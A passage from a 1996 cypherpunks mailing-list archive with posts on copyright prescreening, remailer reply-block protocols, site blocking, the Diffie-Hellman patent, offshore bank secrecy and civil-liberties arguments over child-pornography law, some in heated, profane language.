operator(s) have violated any copyright at all; merely that they have
frustrated the efforts of copyright holders to identify alleged infringers. 
I don't see how any service provider of even modest size can fail to "ignore
blatant violations of copyright law" given the difficulty of figuring out
who's got a right to make which data available.

Even a relatively easy-to-spot infringement (say, an image with "Playmate of
the Month" text visible) requires that some person who's familiar with
Playboy view the image and come to the conclusion that an individual user
probably doesn't have the right to make images available which were
apparently produced by a well-known international publishing operation. The
creation of a prescreening systen would require the development of
protocols/systems which do not now exist, as well as burden the ability of
users to communicate quickly. It's also expensive in terms of human time
required, and likely to fall far short of its mission - e.g., people can
perhaps spot Playboy centerfold images by their vertical-to-horizontal size
ratio (I mean the image, not the model) plus the "Playmate of the month"
text, and they can probably spot popular songs or images .. but matching two
images or arbitrary selections of text is a difficult problem.

Prescreening seems to require access (on the part of the screener) to a
database of already copyrighted works, or a database of hashes (think of a
hash as a digital fingerprint) of copyrighted works. The most likely
scenario I can see would be for the Library of Congress (and equivalent
foreign institutions) to maintain a database of all copyright works (yow!)
in electronic format; and then to compare hashes of the work being screened
to those works in the database. Obviously, such an effort - especially one
which could respond in close-to-realtime - would be *incredibly expensive*. 

(The side effect - that we'd end up with an electronic version of every
copyrighted work in the Library of Congress - is alluring. But if we had
that the obvious step would be to make it Web-accessible, which would so
radically transform the publishing business that copyright infringement
wouldn't even be interesting any more.) 

Keeping a database of hashes online instead of a database of works is less
useful because many of the hashes must be recomputed dynamically - e.g.,
such a system should be able to spot substrings or resizings of copyrighted
works.

And all of this ignores the possibility of fair use. So I guess my point is
that the problem of "acting responsible with respect to letting others post
copyright-protected works without permission" is a lot harder than it sounds
like it ought to be. Good faith on the part of the ISP/remailer isn't even
close to good enough. 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "red" <rednax@asiapac.net>
Date: Tue, 10 Sep 1996 20:50:01 +0800
To: <cypherpunks@toad.com>
Subject: Re: Crypto Num Mum, Hmm
Message-ID: <199609100927.RAA20720@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Are perfect numbers of any use in cryptography?
I have yet to come across the usage or application, let alone heard of it,
but has there been any proposals?

Thanks.

-rednax-
red_naxela@geocites.com
"smile and the mirror smiles"



  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 11 Sep 1996 07:31:16 +0800
To: cypherpunks@toad.com
Subject: PIN_hed
Message-ID: <199609101731.RAA14869@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-9-96. BuWi: 
 
   "Pinkerton and SAIC establish alliance to offer security 
   solutions against high-tech gangs, cybercriminals" 
 
      "Pinkerton's gumshoes with SAIC's spooks represent a 
      unique resource for clients who must hide from the USG 
      high-value, mission-critical assets," said Denis 
      Brown, PKT prez. Bob Beyster, SAIC czar, said, "Our 
      ex-TLAs are available around the clock to jigger-jive 
      clients freaked by TLA-stories of computer hackers, 
      criminals and insiders." PKT bill-pads more than 
      45,000 and SAIC 22,000; both underpay perps and taxes. 
 
   "NCSA: policeman on the internet beat." 
 
      NCSA employs a number of ex-law enforcement officers 
      who try to infiltrate hacker networks and solve 
      problems before they start. "We track hackers by going 
      underground to their sites," Tippett said. "We pretend 
      to be their friends, but they fuck with our heads." 
 
   "Hi/fn Integrates Encryption With Data Compression For 
   Efficient, Secure Networking." 
 
      MUM 1.0 provides a processor independent software 
      implementation of industry standard DES and Triple DES 
      data encryption, HMAC-SHA, HMAC-MD5 keyed hash 
      functions, and LZS(r) and MPPC (Microsoft Point to 
      Point Compression) compression for Internet, intranet 
      and client-server networks. 
 
   ----- 
 
   http://jya.com/pinhed.txt  (14 kb for 3) 
 
   PIN_hed 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Squirrel Remailer <mix@squirrel.owl.de>
Date: Wed, 11 Sep 1996 07:21:51 +0800
To: cypherpunks@toad.com
Subject: Looking for Love
Message-ID: <19960910173401.22472.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm Sham69, the best, most feared computer and telecom hacker in 
America.  And I'm looking to loose my cherry!

Me:  17, 5'8", brown eyes, scraggly hair, inch-thick glasses, pocket protector.

Interests:  late night romantic candle-lit pizza and coke dinners, dumpster
diving by the AT&T corporate offices, making free phone calls all over the
globe, collecting Kevin Mitnik memorabilia, keeping up with the adventures
of those hot babes at The Spot, sleeping on the floor of a cheap Vegas motel
with thirty other geeks at DefCon.

You:  Sexually adverturous, unconcerned with personal hygiene, experienced
at microwaving cold pizza, limited social skills, interested in the Web,
knowledge of DOS batch files a plus.

Please send responses to Box 4456, enquirer@alpha.c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Wed, 11 Sep 1996 12:01:51 +0800
To: cypherpunks@toad.com
Subject: Re: LEOs running anon servers?
In-Reply-To: <Pine.SUN.3.95.960910115139.6526I-100000@stimpy.us.itd.umich.edu>
Message-ID: <199609110102.SAA26681@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


>> There
>> are a number of anonymous remailers out in cyberspace, but it has been
>> stated by a knowledgeable source that a number of them are being operated
>> by law enforcement agencies (presumably to troll for criminal activity). A
>
>
>Can someone verify/discredit/comment on this statement?  Who is the
>knowledgeable source?

Sounds like you're the one trolling.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 11 Sep 1996 11:46:24 +0800
To: "'cypherpunks@toad.com>
Subject: RE: PIN_hed
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960911011317Z-67072@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>From:	jya@pipeline.com [SMTP:jya@pipeline.com]
>
      NCSA employs a number of ex-law enforcement officers 
      who try to infiltrate hacker networks and solve 
      problems before they start. "We track hackers by going 
      underground to their sites," Tippett said. "We pretend 
      to be their friends, but they fuck with our heads." 
 ..................................................................


		Juno.com?

   ..
>Blanc
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 11 Sep 1996 12:47:26 +0800
To: Mike Fletcher <cypherpunks@toad.com
Subject: Re: Guns Don't Kill People, IP Does
Message-ID: <199609110201.TAA29131@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:37 AM 9/10/96 -0400, Mike Fletcher wrote:
>> Sorry for my bad English, perhaps I got misunderstood.
>> Would you run a WWW site where the (say there where some)
>> terrorist who shot down (a wild assumtion too) the TWA plane
>> claiming it was right and all people should fight 'evil
>> America'. Because of your web site there are other bomb
>> attacks in the US (or somewhere else, the country is not that 
>> important) (although it's of course impossible to proove that
>> this bombings are 'inspired' by your web site).
>> Would you support the freedom of speech in this way ?
>
>	Call me crazy, but maybe if "terrorists" had a web page to 
>use to get out their particular message they wouldn't need to go out
>and blow things up to get noticed (well, except for the ones in it
>just for the sake of blowing things up).

That's the RIGHT answer!  Historically, governments have wanted to deny 
dissident-type people the freedom to spread word of their opposition to the 
rest of the population.  This just made the problem worse, ensuring that 
they'd have to use violence to get the word out.   The problem fed on itself 
until these people became "terrorists."  The best way to stop this cycle is 
to allow these people to talk to us, and the web page is the modern form of 
talking.

Be _very_ suspicious of anybody who wants to continue to isolate people he 
calls "terrorists."



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Wed, 11 Sep 1996 12:56:35 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: One Time Reply Blocks (was Re: strengthening remailerprotocols)
In-Reply-To: <199609101730.KAA22130@netcom6.netcom.com>
Message-ID: <v03007801ae5bd3392224@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM -0700 9/10/96, Bill Frantz wrote:
>At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote:
>>At 4:19 PM -0700 9/9/96, Bill Frantz wrote:
>>>To paraphrase John Von Neumann, any system which uses reply blocks is in a
>>>state of sin.  By this I mean that if there is a chain pointing at you, a
>>>sufficiently powerful attacker can walk down that chain and find you.
>>>
>>>Given that, I will join the state of sin by proposing a mechanism which
>>>will allow Alice to receive a reply from Bob, but change her mind at any
>>>time.  The basic idea is to have a one-time reply block which either Bob or
>>>Alice can send to.  If Alice thinks that too much time has elapsed, and
>>>powerful enemies are walking down her reply block chain, she can send
>>>herself a reply and break the chain.  (She might send a reply thru each
>>>link in the chain to break all the links.)
>>
>>The reason the message is not resendable is that the remailers keeps track
>>of the serial number of that header. If forced, the log of serial numbers
>>could be deleted, and the operator would process the message.
>>
>>Unless you are assuming some key archived by each remailer for the reply
>>block, then I think it will be possible to repair the chain.
>
>I was thinking of storing a reply-key in each remailer.  The protocol might
>go something like this (straw man proposal):
>
>(1) Alice picks n random ids (say 160 bits or so) and n random keys.
>(2) Alice sends the combination <id[i], key[i]> to remailer[i], i=0,n-1.
>(3) Alice builds a reply block which consists of the remailer return path,
>each element encyphered with the appropriate key and sends it to Bob.
>(4) When a remailer processes a reply block element, it removes it from the
>reply block, looks up the id in its database, decrypts the address of the
>next hop, removes the database element and forwards the message.
>
>If Alice becomes nervous, she sends n "replys" thru each remailer to cause
>the return path to be destroyed.
>

It is a good idea, but it does involve another whole level of
infrastructure. I am not at all sure that message pools are not a better
system. Your suggestion requires The client to do a lot of work, and for
the remailers to store many keys for indefinite periods.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 11 Sep 1996 10:27:07 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <v01510109ae5bb6783c97@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


I respectfully disagree. I spend most of my time going through sites like
cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com,
lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so
on. Search engines and directories, in particular, are good chokepoints to
block.

Blocking 100 sites would certainly be significant to me -- as long as
they're the right ones. Before the technical fixes, that is.

-Declan


Duncan writes:

>You must admit
>that a ban on 100 sites out of all the sites in the world is pretty
>insignificant.  The swamping effects of thousands and soon millions of sites
>means the governments of the world won't even be able to evaluate a
>significant percentage even if they want to.  And all this *before* we apply
>any of our technical fixes.
>
>DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 11 Sep 1996 15:45:56 +0800
To: Will Day <willday@rom.oit.gatech.edu>
Subject: Re: Harry Browne a cryptographer
In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu>
Message-ID: <Pine.SUN.3.91.960910202937.13178C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Odd. When I spoke with him about crypto and geekstuff -- I thought at 
length -- for about an hour, he never mentioned it.

-Declan


On Tue, 10 Sep 1996, Will Day wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Here's an interesting detail from an AP story:
> 
> A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote:
> >From: 76060.3222@CompuServe.COM ("Steve L. Dasbach")
> >Date: 10 Sep 96 14:32:09 EDT
> >Message-Id: <57196.3235C30E@dehnbase.fidonet.org>
> >To: LPUS-PRES@dehnbase.fidonet.org (LP business - presidential)
> >Subject: APn Article on Harry Browne 
> >
> >   By KARIN MILLER
> > Associated Press Writer
> >   FRANKLIN, Tenn. (AP) -- 
> 
> >   Browne said he formed his attitude toward government when he entered the
> >U.S. Army three years after high school and became a cryptographer.
> 
> The article didn't say anything more about his cryto past..
> 
> ===
> Will Day       <PGP mail preferred>           *  *  *  *  *  *  *  *  *  *  *
> willday@rom.oit.gatech.edu                      HARRY BROWNE FOR PRESIDENT
> http://rom.oit.gatech.edu/~willday/            http://www.HarryBrowne96.org/
> OIT, Georgia Tech, Atlanta 30332-0715         *  *  *  *  *  *  *  *  *  *  *
>   =->  Opinions expressed are mine alone and do not reflect OIT policy  <-=
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3
> Charset: noconv
> 
> iQCVAwUBMjXPcBDHlOdPw2ZdAQHVZwP7Bd5FJ1Usgq7TIzOGofhuC1ihc687zLg/
> pPxzR5/8DpHj6x7agdLnKyivBROX9aTE616pzgjOfqup+/VWHdxRbChJ/S0twrn0
> QPWOq4hkvrm9ygJlUSzmGMBEv4BeT/IIITlwrGUo7jaMtvemKPHiNnfE3u+Ii6xr
> b44iifT6ygg=
> =E9oM
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 11 Sep 1996 06:45:17 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
In-Reply-To: <ae59868c13021004db98@[207.167.93.63]>
Message-ID: <Pine.WNT.3.95.960910201345.-996343C-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Timothy C. May wrote:

> At 10:04 AM 9/9/96, Enzo Michelangeli wrote:
> 
> >I and you may well choose to do so, but the vast majority of the human
> >beings believe just anything that is repeated loud and long enough.
> >Otherwise, nobody would hire PR and pay for advertisement, politicians
> >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead
> >of gunshots, etc. I'm personally not interested in conjuring up the latest
> >utopia for a minoritarian sect of illuminati: I need to live in the real
> >world, and push for viable solutions that change it for better, now.
> 
> Yes, Bosnians and Serbs would not be killing each other if only they could
> receive government-approved information!

In fact, their governments were the chief repeaters of things loud and
long enough, and were believed.

> (Hint: This shows that neither governments nor churches nor the United
> Nations knows any better solutions to the "who do you trust" problem. And,
> I believe, mostly governments and other such entities exist to serve their
> own interests.)

Can you please quote a sentence of mine where I have denied that?

> As to what I presume is an insult to the folks on this list ("I'm
> personally not interested in conjuring up the latest utopia for a
> minoritarian sect of illuminati"), you know where the exit is.

Triple cheers for free speech. Calling for expulsion of those who don't
share your opinion seems to me the clearest sign of will to remain an
enlightened minority. Then, why do you take it as an insult?

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 11 Sep 1996 11:18:23 +0800
To: cypherpunks@toad.com
Subject: Crypto-plutocracy: Cypherpunks mentioned on cover of Oct Wired
Message-ID: <v01510100ae5bc70c21b0@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Splashed on the cover:

"He was the most powerful banker in the world.
"So why is he talking like a cypherpunk?
"Walter Wriston, on the future of money. The Wired Interview.

Inside:

"An amazingly frnak Wired Interview with Walter Wriston about money, the
economy, and the state in the Digital Era. By Thomas A. Bass."

Wriston is the former chair and CEO of Citicorp/Citibank. Good interview.
Though he does say equate crypto nonproliferation treaty to "like a
nonproliferation treaty for atomic weapons" where "an international agency"
could hold the keys.

But it's not an important point to him, really. He's more interested in
making money than talking politics.

I call it crypto-plutocracy.

-Declan

PS: Check out my cyber-rights report card on Clinton v. Dole, page 95.
Co-written with Brock.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 11 Sep 1996 14:14:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Child Porn as Thoughtcrime
In-Reply-To: <ae5ae3bd02021004b70c@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960910203403.13178D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I'll try to respond to some of Tim's questions. Keep in mind it's late; 
I'm about to go to sleep; I don't have my references here. I welcome 
corrections.

-Declan



On Tue, 10 Sep 1996, Timothy C. May wrote:

> Q: Is a drawing of a child engaging in a sexual act an illegal item?

Under the original Hatch bill, yes. Certainly under the revised one. Of 
course, Hatch's proposal goes even farther. There's no "sex act" requirement.
Judy Krug from the ALA testified about this, opposing Bruce Taylor.

> Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old
> illegal?

Even under the original Hatch bill, yes.

> Q: Is writing a story about a child having sex illegal?

Probably not.

> Q: Is a collage of images of little girls (or boys, one presumes) in
> swimsuits, with apparent salacious intent, illegal?

Under the Knox decision, yes. (Dancing girls in leotards are verboten.)

> Q: Is accessing a Web site having nude or sexually-related images of
> children who are of legal sexual age in the site's country--but not in the
> accessor's country--illegal?

If you're in the U.S. and are accessing photos from Sweden, yes. But child
porn laws have been harmonized, so this may be an unlikely scenario. There
is also a treaty I talk about in my August Internet Underground cover story: 

 Not so, says Bruce Taylor, the chief architect of the CDA and a
 professional cyber-scaremonger. The former Federal porn-prosecutor
 believes that "not all censorship is bad."

 "Foreign countries have an obligation to restrict obscenity and child
 pornography on the Internet by the treaty of 1911," says Taylor. "It's
 an agreement between the states to cooperate and to use international
 laws to prosecute obscenity." And to Taylor, books and copies of
 Penthouse magazine can be obscene.


> Q: Is it legal to have photographs of one's own children in a nude state?
> (E.g., playing in a backyard pool, at the beach, etc.) Does it become
> illegal to let others see these photographs? How about putting them on a
> Web site?

You can be harassed by police for it -- reference the Cambridge case
linked to from http://joc.mit.edu/. I think, though I don't have cites,
that other parents have been prosecuted for this. 

> Q: Is a crime committed if a teenaged girls takes a photograph of _herself_
> and shows it to others? To adults? Or if she writes a salacious story about
> herself or her friends? Or if she just invents it all?

Not sure. Perhaps others can help?

> (And as to the obscenity laws, which part of "Congress shall make no law"
> did the readers of the First Amendment miss? I realize this is a
> longstanding topic of discussion, with various famous cases (Miller,
> Hustler, etc.), but it remains a mystery to me.)

Ah. "Obscenity" isn't speech!


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 11 Sep 1996 14:25:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Child Porn as Thoughtcrime
In-Reply-To: <ae5ae3bd02021004b70c@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960910205249.13178F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


>From fight-censorship archives... -Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


ADDITIONAL ANSWER: Because "child pornography" as defined in the
governing Supreme Court case (Ferber) sweeps far more broadly than
"obscenity" ever did (to the point that even scholars who have supported
controls on the latter attacked what the Supreme Court did with the
former).  For example, although the issues were not resolved, the case
revealed that some members of the Supreme Court believe that medical
doctors, anthropologists, journalists covering wars or working for the
National Geographic, or legislators working on new censorship legislation
might all be constitutionally prosecuted for possessing any photographic
images of naked children. 
   Therefore, we need to be extremely careful about any casual 
acceptance of the proposition that "Of course, child pornography can be 
banned."  What we actually mean is, "Of course, one can outlaw the 
use of children in obscene performances."
    Without wanting to sound too legalistic about all this, if we don't 
stay alert we are going to find that a significant part of the 
suppression work sought to be done by "indecency" can be done by "child 
pornography."
                        *******
                Professor Eric M. Freedman
                Hofstra University School of Law
                Hempstead, N.Y.  11550
                Tel. (516)-463-5167
                Fax  (516)-560-7676
                LAWEMF@Vaxc.Hofstra.edu
                        ********   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Sep 1996 11:52:41 +0800
To: cypherpunks@toad.com
Subject: Re: Ban CU Secrecy, Keep TLA's!
Message-ID: <2.2.32.19960911011744.00eb4a98@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:26 PM 9/10/96 GMT, John Young wrote:
>   Mr David Bickford, the first British intelligence lawyer 
>   to speak publicly in the UK, said at a conference in 
>   Cambridge, 50 miles north-east of London, that there 
>   "appears to be no justification at all for offshore bank 
>   secrecy other than to protect the criminal". 

Keeping a client's secrets happens to be an ethical and legal requirement of
the legal profession.  It used also to be a requirement of the medical and
banking professions.  If it is good for lawyers to keep secrets why not
doctors and banks?

>   Mr Bickford, who now runs an international legal 
>   consultancy, said "endemic corruption" is caused by 
>   offshore secrecy, and it is "difficult to see why it is 
>   tolerated by any other than those with an unlawful 
>   disposition". 

So we can retain the ability to say 'fuck you Jack' to fascist bastards such
as yourself.

>   Mr Bickford added that the "justification is put forward 
>   at all is an example of the overwhelming subversive 
>   corruptive influence of organised crime which has managed 
>   to magic a seemingly acceptable position out of the sheer 
>   weight of its financial proceeds from narcotics, fraud, 
>   extortion and other criminal enterprise". 

The definition of a totalitarian is one who wants total involvement in and
control of the lives of those he rules.  We're just trying to keep you and
all the world's rulers from becoming totalitarians.  Quite a public service.
Our fathers used heavy artillery and bombers rather than offshore bank
secrecy to discourage totalitarianism.  Pretty mild of us. 

>   Mr Raymond Kendall, secretary general of Interpol told 
>   the 14th International Symposium on Economic Crime that 
>   governments should commit more resources and step up 
>   co-operation to tackle the growing problem of 
>   international corruption. 

Economic crime = thought crime.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Date: Wed, 11 Sep 1996 07:28:15 +0800
To: ghio@c2.net (Matthew Ghio)
Subject: Re: forward secrecy in mixmaster
In-Reply-To: <199609100232.TAA22069@infinity.c2.org>
Message-ID: <199609101929.VAA19477@kom30.ethz.ch>
MIME-Version: 1.0
Content-Type: text


Matthew Ghio wrote:
> > I agree it does not make much difference mathematically, but one DH modulus
> > always makes me uneasy. DH is still patented though. I think I will continue
> > to use RSAREF, but compose the standard so the protocol supports unlimited
> > key sizes.
  
Just a short note. The DH patent (#4200770), as held by Cylink expires at
the 29th of april '97. Afterwards DH enters the public domain. That's a
certain argument for using DH key exchange. RSA will go into the public
domain somewhen in 2002, if I remember correctly.

Germano




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Sep 1996 13:42:07 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
In-Reply-To: <ae5adff700021004d426@[207.167.93.63]>
Message-ID: <FRi3TD89w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> I didn't call for your "expulsion." No one has been expelled in four years
> of the list's existence.

However Tim has been complaining about my postings to various people I know
and respect. (I stopped respecting Tim years ago.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Sep 1996 14:14:58 +0800
To: cypherpunks@toad.com
Subject: Re: Harry Browne a cryptographer
In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu>
Message-ID: <mZi3TD90w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Will Day <willday@rom.oit.gatech.edu> writes:
> >   Browne said he formed his attitude toward government when he entered the
> >U.S. Army three years after high school and became a cryptographer.
>
> The article didn't say anything more about his cryto past..

... but we know his attitude toward gubment. Instead of advocating violent
overthrow of all gubments, the fucking statist is running for president.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck Thompson <chuck@nova1.net>
Date: Wed, 11 Sep 1996 13:27:48 +0800
To: Blanc Weber <blancw@microsoft.com>
Subject: RE: Child Porn as Thoughtcrime
Message-ID: <1.5.4.32.19960911030546.006c224c@mail.nova-net.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:09 PM 9/10/96 -0700, you wrote:
>>From:	tcmay@got.net 
>>
>>My point is this: For anyone who claims that "thoughtcrime" is something
>>the Evil Empire specialized in, i.e., totalitarian communist regimes, look
>>to the enforcement of laws about what can be viewed or accessed from the
>>United States. Thougtcrime.
>>.........................................................................
>>
>>
>>Those laws obviously (to me) don't have all that much to do with legality nor
>>all that much with thought, either;  but more with a government aiming to
>>"looking good" in front of an audience of voters, presenting an image of
>>being more moral, or "better-than-thou" -  in front of other nations, etc.;
>>that is, to gain favor, and therefore political support, from the Citizen
>>Units by sounding like Mother Superior/fatherly figures who are going to look
>>after All The Little Children (tm), plus all the similarly weak &
>>dispossessed.

Let's see if I understand you correctly.  The anti-child porn advocates are
only interested in votes and positioning themselves as more moral or
"better-than-thou"... 

>>This posturing gives all the un-selfconfident people someone to look up to,
>>even if they don't really get anything (their memories being too short to
>>notice the failed promises, lack of follow-through, and blatant
>>inconsistencies, not to mention the 'legal' crimes committed along the way).

in order to provide an icon for the "citizen units" to worship...

>>Many people seek after sympathy towards their feelings (present and/or future
>>pain) more than to be respected for the ability to think.

because they are too stupid to think for themselves, and therefore are
reduced to going on their intuition...

>>I imagine this
>>develops into a reduced sympathy towards certain kinds of thought or towards
>>thinking per se, eventually, promoting a general atmosphere of tolerance for
>>offenses like "thoughtcrimes".

causing them to be unsympathetic to thinking?  

What in the devil are you trying to say?  Maybe I'm one of those stupid
citizen units.  I just don't get it - I'd like to, but I don't.  How about
rephrasing your comments so that us average citizen units can understand
your wisdom.
   
>>
>>And of course anyone who is free to think about anything & everything (who
>>could therefore potentially think about what everybody else has forgotten)
>>will seem dangerous to those who wish to appear to be in total, beneficent
>>control.

If there is logic to the wind-up, it escapes me.  It seems to me that the
appearance of being in total control (dictatorship) is the last thing any
politician in this country would want to be seen (seen being the operative
word) as attempting.  Is this message spoofed from that juno kid?
Regards,

Chuck Thompson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 11 Sep 1996 15:58:44 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Anachy MUD
Message-ID: <199609110534.WAA14548@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 AM 9/10/96 -0700, Timothy C. May wrote:
>At 5:10 AM 9/10/96, Jon Leonard wrote:
>>Duncan Frissell wrote:
>>> Did anyone make the point (I gave up on the thread) that we already have a
>>> great Crypto Anarchy MUD with lots of the coding already done.  We call it
>>> the Internet.  Digital cash, strong crypto, remailers, everything.
>>
>>Tim May expressed doubt that it was worth the effort:  Not much easier
>>than the real thing, and not as good.  That's the closest to your point,
>>I think.
>....
>>Finally, a MUD has the potential to spread crypto-anarchic ideas to people
>>who would not otherwise have considered them.
>>
>>It may be that I'm wasting my time, but I could come up with some useful
>>new crypto protocol too.
>
>Don't tar me with the "Tim said it was a waste of time" label. Rather, I
>said I thought it would be pretty tough to get a reasonable ontology, one
>with rich enough behaviors and reasonable incentives and disincentives.
>Simulations are an art...they were useful in nuclear war planning, where
>the degrees of freedom were constrained, and so on.

Jon Leonard made it clear to me that he was planning a human-assisted 
game/MUD, rather than a computer simulation.  His explanation is that it is 
difficult to implement an unbiased simulation, because it is difficult to 
"simulate" a human.  But putting people controlling characters into the 
equation restores the "human element" which arguably will make the results 
more realistic.  Makes sense to me.

The one item I suggested was that instead of people controlling individual 
characters in this MUD, they control a "weighted character" whose weight 
depends on the number of people of that type in the society.  After all, in 
the path towards a crypto anarchy-type situation, people will naturally have 
to migrade away from government-oriented solutions, and towards other jobs.  
Some will be killed, some will retire, some will switch jobs, etc.  Turning 
such a group into a weighted character would allow their number to reflect 
societal changes a more quantitatively than individual characters.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Sep 1996 15:43:20 +0800
To: cypherpunks@toad.com
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <ae5b9fde04021004ea77@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Declan answers in the affirmative that, yes, nearly all of the examples I
cited are indeed crimes.

As I well knew, which is why I presented them. (The Jock Sturges case was
in SF, the "little girls in leotards" case was only a few years ago, etc.)

My point really was not to ask if the examples are illegal but to point out
the "thoughtcrime" nature of making it a felony to draw pictures of naked
children, when clearly no actual child was ever involved, when no actual
person could have been the victim of an actual crime.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 11 Sep 1996 15:43:07 +0800
To: "Asgaard" <cypherpunks@toad.com>
Subject: Re: Movies
Message-ID: <19960911054154968.AAA142@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


